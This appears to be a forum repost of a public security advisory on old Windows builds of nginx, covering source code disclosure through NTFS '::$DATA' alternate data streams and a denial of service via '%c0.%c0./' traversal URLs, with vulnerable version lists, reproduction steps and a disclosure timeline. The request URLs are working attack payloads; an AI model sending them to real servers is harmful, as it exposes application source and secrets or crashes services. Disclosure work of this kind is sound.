论坛 › nginx › nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities

TOUVE 发表于 2016-12-25 12:57:22

nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities

　　http://www.example.com/index.html::$DATA
http://www.example.com/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%20
http://www.example.com/%c0.%c0./%c0.%c0./%c0.%c0./%20
http://www.example.com/%c0.%c0./%c0.%c0./%20
　　======TESTED VERSIONS=====

Unix versions are not vulnerable (it only affects to NTFS file system)

Windows Stable versions:

nginx/0.7.66 --> Not vulnerable
nginx/0.7.65 --> Vulnerable
nginx/0.7.64 --> Vulnerable
nginx/0.7.63 --> Vulnerable
nginx/0.7.62 --> Vulnerable
nginx/0.7.61 --> Vulnerable
nginx/0.7.60 --> Vulnerable
nginx/0.7.59 --> Vulnerable
nginx/0.7.58 --> Vulnerable
nginx/0.7.56 --> Vulnerable

Windows Development versions:

nginx/0.8.40 --> Not vulnerable
nginx/0.8.39 --> Vulnerable
nginx/0.8.38 --> Vulnerable
nginx/0.8.37 --> Vulnerable
nginx/0.8.36 --> Vulnerable
nginx/0.8.35 --> Vulnerable
nginx/0.8.34 --> Vulnerable
nginx/0.8.33 --> Vulnerable
nginx/0.8.32 --> Vulnerable
nginx/0.8.31 --> Vulnerable
nginx/0.8.30 --> Vulnerable

======DESCRIPTION======

This application was vulnerable to source code disclosure/download vulnerability when
it was running in Windows OS (NTFS file system).
App parser couldn't handle ADS (Alternate Data Streams) and it treated a data stream as an
usual file. An Attacker could read/download source code of webapps files using default data
stream (unnamed): "filename::$data".

This issue is like an old security issue in Microsoft Windows IIS .

======PROOF OF CONCEPT======

http:///::$data

======STEPS TO REPRODUCE======

1.- Start the server.

2.- Go to http://127.0.0.1/index.html::$data

3.- Browser requests to download...yes...go to file and open it.

======REFERENCES======

-> http://nginx.org/
-> http://www.microsoft.com/technet/security/bulletin/ms98-003.mspx


======DISCLOSURE TIMELINE======

Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)

=> Inicial contact with vendor and sent advisory.
=> Vendor response and believe that vulnerability got fixed with previous release.
=> I confirm that nginx is vulnerable in Windows 7 OS.
=> Vendor will try to see the issue.
=> Vendor confirms the issue and he will get fixed on Monday.
=> New releases out.
=> I sent complete advisory and propose as disclosure date on Wednesday.
=> Second chance to confirm public disclosure.
=> Vendor is agree.
=> Forced to public disclosure.

======CREDITS=======

Jose Antonio Vazquez Gonzalez,
Telecom. Engineer & Sec. Researcher.
http://spa-s3c.blogspot.com/

Thanks to Ruben Santamarta (@reversemode) and Jose María Alonso (@maligno) for their support in other issues.

查看完整版本: nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities